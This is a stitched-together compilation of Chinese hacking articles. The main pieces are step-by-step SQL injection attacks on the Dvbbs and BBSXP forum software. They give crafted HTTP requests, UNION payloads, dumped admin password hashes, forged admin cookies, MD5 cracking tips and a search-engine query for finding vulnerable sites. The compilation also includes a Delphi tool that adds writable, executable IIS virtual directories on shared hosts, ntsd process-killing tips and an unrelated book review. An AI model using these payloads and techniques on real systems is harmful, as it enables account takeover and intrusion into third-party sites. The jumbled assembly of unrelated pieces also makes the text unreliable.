66 response.write "document.write('<FONT color=#b70000>□</FONT><span style=""font-size:9pt;line-height: 15pt""><a href=http://www.pydz.com/sunwinbbs/dispuser.asp?name="& rs(0) &" target=_blank title=查看"&rs(0)&"的个人资料>');"
67 response.write "document.write('"&rs(0)&"</a>');"
68 response.write "document.write('</span><br>');"
---------------------------------------------------------
看见有趣的东西了没有?没错,就是 rs(0) ,如果我们指定 “n=50 userpassword,”(n的值随便选择,看你想偷看多少用户的密码啦),嘿嘿,现在rs(0) 就不是 username 而是 userpassword了,例如:
http://www.target.com/asp/dvbbs/tongji.asp?orders=2&N=2返回:
---------------------------------------------------------
document.write('□');document.write('admin');document.write('
');document.write('□');document.write('ss');document.write('
');
---------------------------------------------------------
http://www.target.com/asp/dvbbs/tongji.asp?orders=2&N=2%20userpassword,
返回:
---------------------------------------------------------
document.write('□');document.write('18e071ccfb2d1c99');document.write('
');document.write('□');document.write('acd5fdfea300e88a');document.write('
');
---------------------------------------------------------
哦,原来admin的密码是18e071ccfb2d1c99,但是经过MD5加密的,别急,用同样的办法你可以把admin的userid、回答问题....全部搞到手。
得到这些能干什么?(准备暴力破解可以略过不看)
曾经看到一篇奇文《得到论坛数据库后如何快速夺取管理员密码<对动网>》,内容大致是:自己安装一个动网论坛,把得到的加过密的16位密码复制下来,贴到你刚才注册的ID的密码处,用找回密码功能就可以了,只要提示问题答案填写正确,密码就发到你的信箱了。
基本上是鬼扯,但作者视MD5如草芥的魄力不得不令小弟佩服。
在老版本的动网中,得到这些信息后可以直接修改用户密码,但在6.0中消除了这一隐患,试看 modifypsw.asp相关代码:
---------------------------------------------------------
elseif md5(trim(request("oldpsw")))<>trim(rs("userpassword")) then
errmsg=errmsg+"<br>"+"<li>输入的旧密码错误,请重新输入。"
founderr=true
exit sub
---------------------------------------------------------
哈哈,不行了吧!
看看管理员操作论坛时到底需要些什么,举个例子,删帖的时候:
---------------------------------------------------------
POST /asp/dvbbs/admin_postings.asp?action=delet HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
Referer:
http://www.target.com/asp/dvbbs/admin_postings.asp?action=删除主题&BoardID=2&ID=2
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)
Host:
www.target.comContent-Length: 124
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: aspsky=userhidden=2&password=18e071ccfb2d1c99&userid=1&userclass=%B9%DC%C0%ED%D4%B1&username=admin&usercookies=0; iscookies=0; BoardList=BoardID=Show; ASPSESSIONIDAASCSCDC=IPKLMGFAKFJLMOLNMMEMFDGC; upNum=0
title=%B9%E0%CB%AE&content=&doWealth=-7&douserCP=-5&douserEP=-5&id=2&replyid=&boardid=2&msg=&submit=%C8%B7%C8%CF%B2%D9%D7%F7
---------------------------------------------------------
明白了吧,这里头该有的我们都可以得到,大家要是有时间就帮论坛管理员删删那些垃圾帖吧:)
还可以做什么?动动脑子,你可以做到更多。
后记:心情太不美丽了,臭屁了这么久您可不要厌烦。Have a nice day!
新版bbsxp注入漏洞再现,可直接得到管理员帐户密码
——我找到bbsxp5 sp1漏洞的过程总结
前期杂志有篇文章是关于BBSXP的,用的是Cookie注入攻击,作者真是思路巧妙,可以想到逻辑漏洞。当时看了文章后,学校有事情就没读代码。暑假闲着无事,所以就把最新版的BBSXP下载下来读了一遍。BBSXP确实短小精悍,文件有少又短,不过比起DVBBS无论从功能上还是界面上还是有点差别,不过从漏洞上比还确实无分上下, 经过了3年的测试,还是多少有点瑕疵。
一.漏洞寻找
论坛对字符串输入用HTMLEncode转换,数字类型的用int函数调整,Isnumeric函数判断。很显然查询中有数字和字符串作为值输入的肯定不能利用了。不能做为值输入可以做为什么输入呢?这就是问题的关键。我把每个文件带着这个思路粗略浏览了一遍,用了很长时间才在search.asp(好象以前就有过漏洞,改了原来的却有了新的)找到了漏洞,一起看看代码。
<!-- #include file="setup.asp" -->
<%
top
if Request.Cookies("username")=empty then error("<li>你还未<a href=login.asp>登录</a>社区")
DetectPost
if Request("menu")="ok" then
search=Request("search")
forumid=Request("forumid")
TimeLimit=Request("TimeLimit")
content=HTMLEncode(Request("content"))
searchxm=HTMLEncode(Request("searchxm"))
searchxm2=HTMLEncode(Request("searchxm2"))
searchxm2=replace(searchxm2,"@","&")
if content=empty then content=Request.Cookies("username")
if isnumeric(""&forumid&"") then forumidor="forumid="&forumid&" and"
if search="author" then
item=""&searchxm&"='"&content&"'"
elseif search="key" then
item=""&searchxm2&" like '%"&content&"%'"
end if
if TimeLimit<>"" then TimeLimitList="and lasttime>"&SqlNowString&"-"&int(TimeLimit)&""
sql="select top "&MaxSearch&" * from forum where deltopic<>1 and "&forumidor&" "&item&" "&TimeLimitList&" order by lasttime Desc "
rs.Open sql,Conn,1
……
我们仔细研究一下 sql=”select top “&MaxSearch …这句,其中MaxSearch是定义好的,默认值为500,剩下3处是从外面输入的。
1.if isnumeric(""&forumid&"") then forumidor="forumid="&forumid&" and"
只要forumid输入为空,那么forumidor就为空.
2.if TimeLimit<>"" then TimeLimitList="and lasttime>"&SqlNowString&"-"&int(TimeLimit)&""
TimeLimit是个整数,随便输入(输入个1),那么TimeLimitList变成” and lasttime>now()-1”,在MSSQL中变成” and lasttime>getdate()-1”.
3. if search="author" then
item=""&searchxm&"='"&content&"'"
elseif search="key" then
item=""&searchxm2&" like '%"&content&"%'"
end if
只要search=”author”,content随便输入(输个abcd),那么item= HTMLEncode(searchxm)=’abcd’,只要我们构造好输入,通过上面的语句,就把SQL语句变为:
select top 500 * from forum where deltopic<>1 and [ HTMLEncode(searchxm)] =’abcd’ and lasttime>now()-1 order by lasttime Desc
用中括号括起来的部分前后都没单引号,显然可以利用了。
先看看 HTMLEncode函数
function HTMLEncode(fString)
fString=replace(fString,";",";")
fString=server.htmlencode(fString)
fString=replace(fString,"'","'")
fString=replace(fString,"--","--")
fString=replace(fString,"\","\")
fString=replace(fString,vbCrlf,"<br>")
HTMLEncode=fString
end function
过滤了”; ‘ -- \ vbcrlf”,还有”< > &”等,其实过滤的也算严密了,程序员也挺难的,过滤多了可能影响使用,少了又会出安全问题。过滤了这么多我们该如何利用呢?大家自然想到了猜测,是一个可行的办法,表的结构也都知道了,也很容易猜的。不过我还是用个简单的办法吧。
二.漏洞利用
还是用本人很熟悉的union查询,对ACCESS和MSSQL都有效。构造过程本人就不写了,直接给大家看结果。
select top 500 * from forum where deltopic<>1 and
forumid=0 union all select top 1 1,1,[user].username as topic,forum.use
rname,content,forum.posttime,forum.postip,1,1,1,1,1,1,1,[user].userpass as lastname,lasttime,polltopic,clubconfig.adminpassword as pollresult,1 from [user],forum,clubconfig where [user].membercode=5 or forum.id=0 or clubconfig.adminpassword
=’abcd’ and lasttime>now()-1 order by lasttime Desc
其中有颜色部分是我们要输入的searchxm的值,中间的每个字符HTMLEncode函数都没有过滤到。至于这个语句的含义,就是让union 前面的语句为假,因为forumid不可能为0,union后面只查询出一条记录,其中包含了管理员的用户名和加密密码,还有社区管理的加密密码,懂SQL语句的朋友一看就明白了。其中数字1没有意义,只是为了匹配字段的类型,保证union前后字段数目和类型一致就行了。这里可以任意构造,有兴趣的朋友可以构造自己的查询,我给出的只是一个参考。
构造好了输入语句,还要构造提交。这时就要想到WSE这个经典之作,如果有人认为对HTTP协议已经熟的可以自己写提交字符串,我也应该劝他省省体力和脑力。
[图1]
[图2]
构造的提交如下:
POST /bbsxp/search.asp?menu=ok HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://localhost:8000/bbsxp/search.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE2)
Host: localhost:8000
Content-Length: 481
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: eremite=0; userpass=E80B5017098950FC58AAD83C8C14978E; username=admin; skins=1; ASPSESSIONIDSSRQSDTB=OGLJMADCECKAFKGCPCCHBKHO; onlinetime=2004%2D8%2D13+20%3A08%3A33; addmin=0
content=fsaf&search=author&searchxm=%20forumid%3D0+union+all+select+top+1+1%2C1%2C%5Buser%5D.username+as+topic%2Cforum.username%2Ccontent%2Cforum.posttime%2Cforum.postip%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C%5Buser%5D.userpass+as+lastname%2Clasttime%2Cpolltopic%2Cclubconfig.adminpassword+as+pollresult%2C1+from+%5Buser%5D%2Cforum%2Cclubconfig+where+%5Buser%5D.membercode%3D5+or+forum.id%3D0+or+clubconfig.adminpassword&searchxm2=topic&TimeLimit=&forumid=&submit1=%BF%AA%CA%BC%CB%D1%CB%F7
其中searchxm部分我自己写了个HTML页面,用WSE截获就可以获得编码了。
这里有个地方需要注意,就是COOKIE中的username和userpass必须是自己真实的。
把上面的代码保存到记事本中用nc提交
nc –vv host port<post.txt >a.txt
post.txt为提交信息,a.txt用来接受返回数据。
返回如下信息:
…
…
<script>ShowForum("1","abcdef","","昨夜长风","1","1","1","1","21232F297A57A5A743894A0E4A801FC3","1","1","67BA892B516067544ED15DE74B3DD2DD","2004-7-15 18:45:45");</script>
…
…
返回信息中类似上面的结构只有一条,其中abcdef为管理员用户名,两个32位长字符串,前者为abcdef的加密密码,后者为社区管理加密的密码,用的都是MD5加密。
到这里我想大家已经知道怎样利用了。可以利用Cookie欺骗进行前台管理,这要用到IECookiesView,具体过程请看相关教程,在此不再赘述。如果大家有时间可以用MD5CrackV2.2.exe暴力破解后台加密的密码,这个工具确实很实用,8位数字密码几分钟(我的机子)就可以破解了,所以10位数字和8为小写字母都可以强破。
想找BBSXP论坛,可以在Google上输入“Powered by BBSxp 5.00”,80%以上网站存在此漏洞。
三 .总结
本人由于书写匆忙,文章有些地方可能需要理解,拙劣之处还请大家见凉,不足之处请指出。写此文章只是给大家抛砖引玉,分享一下自己的经验,也提醒大家寻找漏洞时要把握程序的结构和流程,提醒作者写程序时不因细小而忽略。其实漏洞修补很简单,只要searchxm部分不是用用户输入,而是程序设定就没问题了,也没必要改变HTMLEncode函数。
暑假闲着无事,顺便把漏洞利用程序写了出来,免的象上次一样自己发现的漏洞让别人帮忙写程序。希望大家不用利用漏洞做破坏,一切后果自己负责。
<%
On Error Resume Next
Server.ScriptTimeOut=9999999
Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage=BytesToBstr(t,"gb2312")
End function
Function GetBody(url)
on error resume next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(body,Cset)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
Function Newstring(wstr,strng)
Newstring=Instr(lcase(wstr),lcase(strng))
if Newstring<=0 then Newstring=Len(wstr)
End Function
qq = "123456"
url="http://webpresence.qq.com/getonline?Type=1&"&qq&":"
wstr=getHTTPPage(url)
if wstr = "online[0]=0;" then
response.write "unonline"
else
response.write "online"
end if
%>
这是我网站中的部分代码,我提取了其中部分,已经算是完整的了。可以正常截取QQ在线离线信息。当然你可以调整XMLHTTP.ReadyState,实时获取数据。
很久,很久没有和大家聊天了,很想大家的。见面先就给大家送个小礼吧。其实也不是什么好东西。
在研究和学习中进步,没有研究,没有深入的去了解,就没有进步。认真的学习态度+穷追不舍+十万个为什么。
得到的结果就是成就!
好了,屁话放了太多了。明白的人,不看上面的话都明白。不明白的人,看了也许永远也不会明白。
系统中有个VBS也可以实现这样的功能的。不过我认为,如果在台虚拟主机中,存在多个网站的情况下。
建立虚拟目录,也只能在第一个默认的站点中。一般情况下虚拟主机默认是关掉的。也就是你建好了,通过HTTP也不能访问。
从MSDN中,我找到了一些相关的技术资料,写了个小工具。可以建立在其它站点中。这里看来说起来有点混乱。
我举例给大家说说吧。
拿个虚拟主机的 Internet 信息服务中的列表给大家看看就明白了
+默认 web 站点(已停止)
+管理 web 站点(已停止)
+163.com
+263.com
+363.com
好,上面大家看到了,有三个站点是开放的。而前面那个默认的已经被关闭了。
这时,我们用VBS建立虚拟目录,是建立在默认的站点中,而站点被停止了,所以建立成功后,也不能访问。
比如:我们怎么能在263.com这个站中,建立一个目录,比如:VDIR,通过http://www.163.com/VDIR就可以访问了呢?
通过查找资料,我得到了,在建立的时候,允许指定一个序号,比如:1..N
1 : 表示,在默认的站点中,然后按着这个顺序来,而363.com对应的序号就是5.
明白了这个道理后,用程序来实现这个功能就比较简单了。当然,你会说,那么我想在263.com这个站中,建立。
但是我不知道,这个站对应的序号是多少,对于这个问题,我们只能从序号3开始一直往下建立,(1,2对应的是前面默认的)
当建立一个后,可以读出他的配置信息,返回给大家。建一个后,你就明白是不是建立在你想要建的那个站中,如果不是。
也可以把他删掉。再增加序号。:)(有没有一个工具,可以在命令行下,实现把所有的主机站点信息,比如:名称,对应目录之类的列出来?原理差不多,你看完代码应该会写了)
以下是代码:
program VDir;
{$APPTYPE CONSOLE}
uses
ActiveX,SysUtils,ComObj;
Var
VName,
VPath,
Vattrib : String;
CreateVpath : Boolean;
WebIndex : integer;
Procedure ShowHelp;
Begin
WriteLn('=========== VDir by CYFD! ============');
WriteLn('');
WriteLn('Useag:'+ParamStr(0)+' <-n:VName> <-p:VPath> <-i:WebIndex> <-c:CmdType> [-r:Vattrib]');
WriteLn('');
WriteLn('Sample:'+ParamStr(0)+' -n:yfd -p:c:\ -i:1 -c:1 -r:0,1,3');
WriteLn('');
WriteLn(' CmdType :');
WriteLn(' 1 : Create');
WriteLn(' 0 : Delete');
WriteLn(' Vattrib :');
WriteLn(' 0 : AccessScript');
WriteLn(' 1 : AccessRead');
WriteLn(' 2 : AccessWrite');
WriteLn(' 3 : AccessExecute');
WriteLn(' 4 : EnableDirBrowsing');
End;
Procedure ParseParam(Str : String);
var
tStr : String;
Begin
tStr := lowercase(Copy(Str,1,3));
if tStr='-n:' then
VName := Copy(Str,4,Length(Str));
if tStr='-p:' then
VPath := Copy(Str,4,Length(Str));
if tStr='-c:' then
CreateVpath := StrToIntDef(Copy(Str,4,Length(Str)),1) = 1;
if tStr='-r:' then
Vattrib := Copy(Str,4,Length(Str));
if tStr='-i:' then
WebIndex := StrToIntDef(Copy(Str,4,Length(Str)),1);
End;
Function GetStrForSpace(SourceStr :String ; JGZF:char ; Index:integer):String;
var
Pchar1 : pchar;
i , count : integer;
cStr : string;
begin
Count := 0;
Pchar1 := pchar(SourceStr);
cStr := '';
for i:=0 to length(Pchar1)-1 do begin
if pchar1[i] = JGZF then
begin
Count := Count + 1;
if Count = Index then begin
break;
end;
end
else if Count = Index -1 then cStr := cStr + pchar1[i];
end;
Result := cStr;
end;
procedure CreateVDir(Vdirpath:string);
var
WebSite, WebServer, WebRoot, VDir,Binds: Variant;
BindStr : String;
begin
Try
WebSite := CreateOleObject('IISNamespace');
WebSite := WebSite.GetObject('IIsWebService', 'localhost/w3svc');
WebServer := WebSite.GetObject('IIsWebServer', IntTostr(WebIndex));
// 这里的WebIndex就是你要建立的序号.
WebRoot := WebServer.GetObject('IIsWebVirtualDir', 'Root');
if CreateVpath then Begin
VDir := WebRoot.Create('IIsWebVirtualDir', VName);
Vdir.AccessScript := pos(',0,',Vattrib) >0;
VDir.AccessRead := pos(',1,',Vattrib) >0;
VDir.AccessWrite := pos(',2,',Vattrib) >0;
VDir.AccessExecute := pos(',3,',Vattrib) >0;
VDir.EnableDirBrowsing := pos(',4,',Vattrib) >0;
// 以上几行是为你建立的目录设访问权限。可写,可读,可执行,可流览...
VDir.Path :=VDirPath;
VDir.SetInfo;
Binds := WebServer.ServerBindings;
BindStr := Binds[0]+':';
WriteLn('');
WriteLn('Result :');
WriteLn('');
WriteLn('IP : '+ GetStrForSpace(BindStr,':',1));
WriteLn('Port : '+ GetStrForSpace(BindStr,':',2));
WriteLn('HostName : '+ GetStrForSpace(BindStr,':',3));
WriteLn('');
WriteLN('Path Is: ' + WebRoot.Path);
WriteLN('Index IS: ' + IntTostr(WebIndex));
WriteLn('Comment : ' + WebServer.ServerComment);
// 上面几行就是得到站点的一些信息,IP,端口,主机名,路径,等等..
WriteLn('');
WriteLn('Create success.');
End
Else Begin
WebRoot.Delete('IIsWebVirtualDir', VName);
Writeln('Delete Success.');
End;
Except
WriteLn('Fail.');
End;
end;
Var
i : integer;
begin
coinitialize(nil);
if ParamCount <4 then Begin
ShowHelp;
Exit;
End;
For i:=1 to ParamCount do
ParseParam(Paramstr(i));
if (ParamCount = 5) and (Vattrib ='') then Begin
ShowHelp;
Exit;
End;
Vattrib := ','+Vattrib+',';
CreateVDir(VPath);
{ TODO -oUser -cConsole Main : Insert code here }
end.
代码可以用COPY到记事本中,然后保存为VDIR.DPR 文件,用DELPHI打开编译一下就行了。
使用方法:
我要在默认站点(序号为1)中建立一个,可读,可写,可注浏览的目录,名称为: yfd 路径为c:\
那么这么使用:
D:\VDir.exe -n:yfd -p:c:\ -i:1 -c:1 -r:1,2,4
程序帮助显示:
Useag:VDir.exe <-n:VName> <-p:VPath> <-i:WebIndex> <-c:CmdType> [-r:Vattrib]
Sample:D:\VDir.exe -n:yfd -p:c:\ -i:1 -c:1 -r:0,1,3
CmdType :
1 : Create
0 : Delete
Vattrib :
0 : AccessScript (脚本访问)
1 : AccessRead (可读)
2 : AccessWrite (可写)
3 : AccessExecute (可执行)
4 : EnableDirBrowsing (可浏览)
-n: 建立的目录名称
-P: 建立的目录路径
-i: 序号
-c: (1表示建立,0表示删除)
-r: (当选择建立的时候,请输入他相应的访问权限值,删除的时候可以不写).
返回结果:
D:\>VDir.exe -n:yfd -p:c:\ -i:1 -c:1 -r:1,2,4
Result :
IP : 127.0.0.1
Port : 80
HostName :
Path Is: E:\Script\WEBTEST
Index IS: 1
Comment : 默认 Web 站点
Create success.
学习,努力学习!好好学习,认真学习,我KAO,天天学习!
么才能关掉一个用任务管理器关不了的进程?
我前段时间发现我的机子里多了一个进程,只要开机就在,我用任务管理器却怎么关也关不了
答:1.杀进程很容易,随便找个工具都行。比如IceSword。
关键是找到这个进程的启动方式,不然下次重启它又出来了。
顺便教大家一招狠的。其实用Windows自带的工具就能杀大部分进程:
c:\>ntsd -c q -p PID
只有System、SMSS.EXE和CSRSS.EXE不能杀。
前两个是纯内核态的,最后那个是Win32子系统,ntsd本身需要它。
ntsd从2000开始就是系统自带的用户态调试工具。被调试器附着(attach)的进程会随调试器一起退出,所以可以用来在命令行下终止进程。使用ntsd自动就获得了debug权限,从而能杀掉大部分的进程。
ntsd会新开一个调试窗口,本来在纯命令行下无法控制,但如果只是简单的命令,比如退出(q),用-c参数从命令行传递就行了。
NtsdNtsd 按照惯例也向软件开发人员提供。只有系统开发人员使用此命令。有关详细信息,请参阅 NTSD 中所附的帮助文件。
usage: ntsd [-?] [-2] [-d] [-g] [-G] [-myob] [-lines] [-n] [-o] [-s] [-v] [-w]
[-r BreakErrorLevel] [-t PrintErrorLevel]
[-hd] [-pd] [-pe] [-pt #] [-pv] [-x | -x{e|d|n|i} ]
[-- | -p pid | -pn name | command-line | -z CrashDmpFile]
[-zp CrashPageFile] [-premote transport] [-robp]
[-aDllName] [-c "command"] [-i ImagePath] [-y SymbolsPath]
[-clines #] [-srcpath SourcePath] [-QR \\machine] [-wake ]
[-remote transport
erver=name,portid] [-server transport
ortid]
[-ses] [-sfce] [-sicv] [-snul] [-noio] [-failinc] [-noshell]
where: -? displays this help text
command-line is the command to run under the debugger
-- is the same as -G -g -o -p -1 -d -pd
-aDllName sets the default extension DLL
-c executes the following debugger command
-clines number of lines of output history retrieved by a remote client
-failinc causes incomplete symbol and module loads to fail
-d sends all debugger output to kernel debugger via DbgPrint
-d cannot be used with debugger remoting
-d can only be used when the kernel debugger is enabled
-g ignores initial breakpoint in debuggee
-G ignores final breakpoint at process termination
-hd specifies that the debug heap should not be used
for created processes. This only works on Windows Whistler.
-o debugs all processes launched by debuggee
-p pid specifies the decimal process Id to attach to
-pd specifies that the debugger should automatically detach
-pe specifies that any attach should be to an existing debug port
-pn name specifies the name of the process to attach to
-pt # specifies the interrupt timeout
-pv specifies that any attach should be noninvasive
-r specifies the (0-3) error level to break on (SeeSetErrorLevel)
-robp allows breakpoints to be set in read-only memory
-t specifies the (0-3) error level to display (SeeSetErrorLevel)
-w specifies to debug 16 bit applications in a separate VDM
-x sets second-chance break on AV exceptions
-x{e|d|n|i} sets the break status for the specified event
-2 creates a separate console window for debuggee
-i ImagePath specifies the location of the executables that generated
the fault (see _NT_EXECUTABLE_IMAGE_PATH)
-lines requests that line number information be used if present
-myob ignores version mismatches in DBGHELP.DLL
-n enables verbose output from symbol handler
-noio disables all I/O for dedicated remoting servers
-noshell disables the .shell (!!) command
-QR <\\machine> queries for remote servers
-s disables lazy symbol loading
-ses enables strict symbol loading
-sfce fails critical errors encountered during file searching
-sicv ignores the CV record when symbol loading
-snul disables automatic symbol loading for unqualified names
-srcpath specifies the source search path
-v enables verbose output from debugger
-wake wakes up a sleeping debugger and exits
-y specifies the symbol search path (see _NT_SYMBOL_PATH)
-z specifies the name of a crash dump file to debug
-zp specifies the name of a page.dmp file
to use with a crash dump
-remote lets you connect to a debugger session started with -server
must be the first argument if present
transport: tcp | npipe | ssl | spipe | 1394 | com
name: machine name on which the debug server was created
portid: id of the port the debugger server was created on
for tcp use: port=
for npipe use: pipe=
for 1394 use: channel=
for com use: port=,baud=,
channel=
for ssl and spipe see the documentation
example: ... -remote npipe
erver=yourmachine,pipe=foobar
-server creates a debugger session other people can connect to
must be the first argument if present
transport: tcp | npipe | ssl | spipe | 1394 | com
portid: id of the port remote users can connect to
for tcp use: port=
for npipe use: pipe=
for 1394 use: channel=
for com use: port=,baud=,
channel=
for ssl and spipe see the documentation
example: ... -server npipe
ipe=foobar
-premote transport specifies the process server to connect to
transport arguments are given as with remoting
Environment Variables:
_NT_SYMBOL_PATH=[Drive:][Path]
Specify symbol image path.
_NT_ALT_SYMBOL_PATH=[Drive:][Path]
Specify an alternate symbol image path.
_NT_DEBUGGER_EXTENSION_PATH=[Drive:][Path]
Specify a path which should be searched first for extensions dlls
_NT_EXECUTABLE_IMAGE_PATH=[Drive:][Path]
Specify executable image path.
_NT_SOURCE_PATH=[Drive:][Path]
Specify source file path.
_NT_DEBUG_LOG_FILE_OPEN=filename
If specified, all output will be written to this file from offset 0.
_NT_DEBUG_LOG_FILE_APPEND=filename
If specified, all output will be APPENDed to this file.
_NT_DEBUG_HISTORY_SIZE=size
Specifies the size of a server's output history in kilobytes
Control Keys:
Quit debugger
Break into Target
Force a break into debuggee (same as Ctrl-C)
Debug Current debugger
Toggle Verbose mode
Print version information
ntsd: exiting - press enter ---
用法:开个cmd.exe窗口,输入:
ntsd -c q -p PID
把最后那个PID,改成你要终止的进程的ID。
如果你不知道进程的ID,任务管理器-》进程选项卡-》查看-》选择列-》
勾上"PID(进程标识符)",然后就能看见了。
2.xp下还有两个好东东
tasklist和tskill
tasklist能列出所有的进程,和相应的信息
tskill能查杀进程le
语法很简单
tskill 程序名!!
关于黑客安全的书籍已经为数不少了,能称得上是经典的作品却不多。放眼看去,我认为有三部作品最值得推荐。一本是《应用密码学》,这是一本真实系统地介绍了密码学及该领域的全面参考书,内容广博、权威且实用。第二本是《黑客大曝光》,这是一本国内外都十分畅销的图书,注重案例分析,探讨攻防对策是最大的特色。以上两书的作者在国外都享有盛誉,而第三本值得推荐的作品,也是这篇文章着重介绍的,就是这部署名为Anonymous(匿名,音译为"安尼姆斯")的《Maximum Security》(中文版《最高安全机密》),如今出版的是该书的第3版。该书第1版面世之初,就引起了不少的争议。来自《Computer World》的Sharon Machlis 说道"想要学习如何破坏服务器吗?寻找生成病毒代码的工具?在电脑空间中隐藏你的身份?想要成为黑客的人通常会求助于不公开的杂志或破译者站点来获得这些技巧和提示。但是现在一个主流的出版商有一本充满这些建议的书。该书面向系统管理员,却引发了另一轮的争论,就是到底应该向一般公众宣传多少安全信息。"Anonymous在美国曾经是一位臭名昭著的黑客,80年代即开始尝试利用网络侵入金融系统,并亲手导演了一系列震惊海内外的金融案件。由于该案影响很大,书籍出版之时引起的争议也如此之大,Anonymous也终于被政府禁止在其作品上署名。这是一部著名黑客现身说法的作品,讲述的是如何防范黑客。
然而,无可否认的是,这是一本与众不同的安全图书。《最高安全机密》(第3版)跟前面所提到的那两本书各有千秋,《应用密码学》的作者施奈尔不愧是一位畅销书的作家,他的每本作品都曾获大奖,语言上追求完美,把复杂问题简单化、通俗化是他在写作上的最大特点,《网络信息安全的真相》可以看作是该书的续集;《黑客大曝光》则号称是漏洞宝典,从攻击者和防御者的不同角度系统阐述了计算机和网络的入侵手段及相应防御措施,目前发展到第2版--作者还写了多本连枝的书,当然都不如这本"正品"。《最高安全机密》一书的组织方式与普通的计算机书籍完全不同,使用的方法也与普通的计算机书籍迥然不同,后面我将与大家详细探讨。正是由于作者的特殊经历,使得《最高安全机密》一书从第1版开始即获得了读者的广泛关注。人们对此书发表得更多的是正面的评价,来自《PC Computing》的Rich Schwerin盛誉此书是"任何系统管理员都需要的读物。请运用来自黑客的观点、提示和技巧,缝起你系统的缺口。"Ben Elgin(ZDNet Whole Web Catalog)的评价似乎更能全面地代表读者的评价,他认为这本书"提供了一个非常全面的关于Internet黑客程序及技术的教程--它也唤醒了Web站点管理员。通过诚实地评估众多工具对特定的平台及网络配置的影响,Web站点管理员将能更好地认识到如何去保护他们的网络,以及怎样确定安全缺口发生的时间和地点。"机械工业出版社曾经引进并组织出版了这本书的前两版,一直被国内行业人士奉为必读之作,很多读者成为该书拥趸,每版必读。
跟其他泛泛而谈的安全图书不一样的地方是,这本书从一个黑客的角度,着重于介绍攻击和防范的两面。《Library Journal》如此评价道,认为该书"详细地讨论了Internet战争、编程语言、扫描程序、嗅探器、口令破译程序、特洛伊木马、平台安全、远程攻击、欺骗、防火墙、以及法律。它既是一本防御用书,也是一部攻击用书。" 读者也许不相信自己会是受害者,然而阅读完全书以后人们就会发现,任何人都是潜在的受害者;你要么是麻烦制造者,要么就是麻烦的澄清者,在这样的战争中你绝对不可能处于中立。从这个层面去看,我认为这是一部"黑客兵法",它教会你如何在这场"没有硝烟的战争"中取得胜利。书中不仅讲述了现今与安全问题有关的内容,而且还讲述了安全问题在未来的发展动向,整本书所提供的"方法学"有着非常经典和通用的含义。作者提到"由于经验相对不足,可能会出现各种各样的网络安全问题。基于上述原因,本书将始终以提高读者的安全经验作为主要任务。"有意思的是,在阅读这本书的过程中,我们经常会发现作品中渗透着许多极具价值的经验与总结,正应验着某些现实的问题。
与普通计算机书籍相比,这是一本组织方式独树一帜的图书,读者的阅读方法也会有所不同。《最高安全机密》(第3版)一书包含1000多个URL或Internet地址,事实上为用户提供了一张关于Internet安全信息的在线藏宝图。这些额外的信息使得读者能够及时地得到各种更新的信息,同时也是读者进一步提升的重要参考。此外,书中还提供了各种的Internet安全工具,鉴于此,《最高安全机密》拥有了许多同类书籍所不具备的优点。一张地图、一把铲子、一本指南,构成了绝佳的组合。当然,还应该有一位探险家参与其中。一位探险者Bob Bruen(Cipher-Newsletter of the IEEE Technical Committee on Security and Privacy)如此说道"要确保你站点的安全(谁不呢?),这本书将是非常值得购买和阅读的--它有着接近200页的黑客工具信息。有足够的理由购买本书,除非你不想自己从事这项研究。"
从第I部分的导引开始,作者向读者介绍了目前信息安全领域的发展情况,也指出了目前我们所面临的问题及其原因。作者提出,企业应用系统的安全性问题常常来自于四大源头:网络和主机的配置有误;操作系统和应用程序存在缺陷;厂商缺少质量评价及回应的有效手段;安全领域的人才奇缺。第II部分则讲述了信息安全的基本理论,对于读者如何从头建立起一个安全的计算机环境,提供了可靠的认识保障。
防护和攻击是网络安全中的一对矛盾,在安全的教育方面更是如此。作者有这样的一个观点,要想有效地进行防护,就必须对攻击的技术手段、工具有深入的了解;而想要攻击成功,也必须深入了解目标系统的防护手段、内部结构等。该书即是如此,目的不是让读者去加害于人,但要进行有效防护,就必须了解攻击手段,所以在书中作者对攻击和防护的两个方面都作出了详细的探讨。
读者经常会混淆"骇客(Hacker)"和"黑客(Cracker)"这两个词,在书中作者对两者下了非常明确的定义。骇客(Hacker),指的是那些对任何计算机操作系统的深奥的工作机理都非常感兴趣的人,他们一般都是程序员。因此,骇客拥有操作系统和编程语言等方面丰富的知识,他们能够发现系统中的漏洞以及出现这些漏洞的原因;骇客能够不断地追求更加深入的知识,与别人共享他们的发现,并且从来不会破坏数据。黑客(Cracker)是指怀有恶意企图、入侵到远端计算机或者破坏远端系统完整性的人。黑客往往在未经授权访问的情况下破坏重要的数据、拒绝合法的用户访问,从而给目标机器带来各种安全问题。由于其行为的恶意性,黑客往往容易被发现。一言以蔽之,前者是"善人",后者是"恶客"。
前两部分无疑只是个热身,该书从第III部分开始渐入佳境,这部分共有三章,第7章欺骗攻击,第8章隐藏标识以及第9章揭开黑客攻击的神秘面纱,详细地介绍了入侵的场景,其中涉及到黑客工具箱。通过阅读,将使读者得以了解到各种的Internet工具和这些工具的扩展信息,包括工具的编写者、使用者、工作原理以及如何从中受益。第9章则仔细地陈述了一些诸如攻击发生的时间,攻击者的类型,解密使用的操作系统,是否有典型的攻击,谁是最频繁的攻击对象,以及攻击动机是什么这些问题。
